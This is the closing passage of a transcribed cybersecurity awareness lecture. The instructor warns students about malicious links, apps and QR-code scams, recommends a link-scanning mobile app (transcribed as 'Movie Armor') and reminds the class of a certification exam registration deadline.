how dangerous it is if that particular link or a URL or a particular pop-up message or a particular application which you are downloading, if it is a malicious, if it contain a payload, if you run that particular application, this attacker is also able to take a full control of your machine. That's why the frauds has been happened to the victims. Got it?
Yes, sir.
Yes, sir.
So always aware about it. Do not click any particular link, whatever the link you are, the sender is sent it to you. And there is an application called Movie Armor. Okay. So you install that application in your mobile. If from there and paste in this Movie Armor, it will tell you the particular link is safe or not. Similarly for the barcode also. There is a scam during this period is going on, the barcode scam. They are actually sending you a fake barcode. So if you are scanning those barcodes, your mobile goes hacked. So in Movie Armor, there is a feature to scan your barcodes. Okay, there are more features are also there. So if you want to get safe, just download that particular application from the Play Store or your iOS store. Okay.
What is the name of the app?
So yeah, Movie Armor. See,
Mobi.
see here. Movie Armor. This is Movie Armor. So go to your Play Store or iOS store if you want to get that particular.
No, just
So you look the message which is sent today in your group. The last day to fill the form which is sent yesterday. The last date, I think so, the 2nd of February is that one. So tell to your friends, if someone wants to enroll in the CES certification exam, kindly fill the form before 2nd of Feb or till 2nd of Feb. Okay.
Okay, sir.
Okay. So fine. So I'm ending up with today's session over here. We will continue the class day after tomorrow on Monday. Okay.
Okay, sir. Thank you, sir.
Okay. Good night, everyone.
Thank you.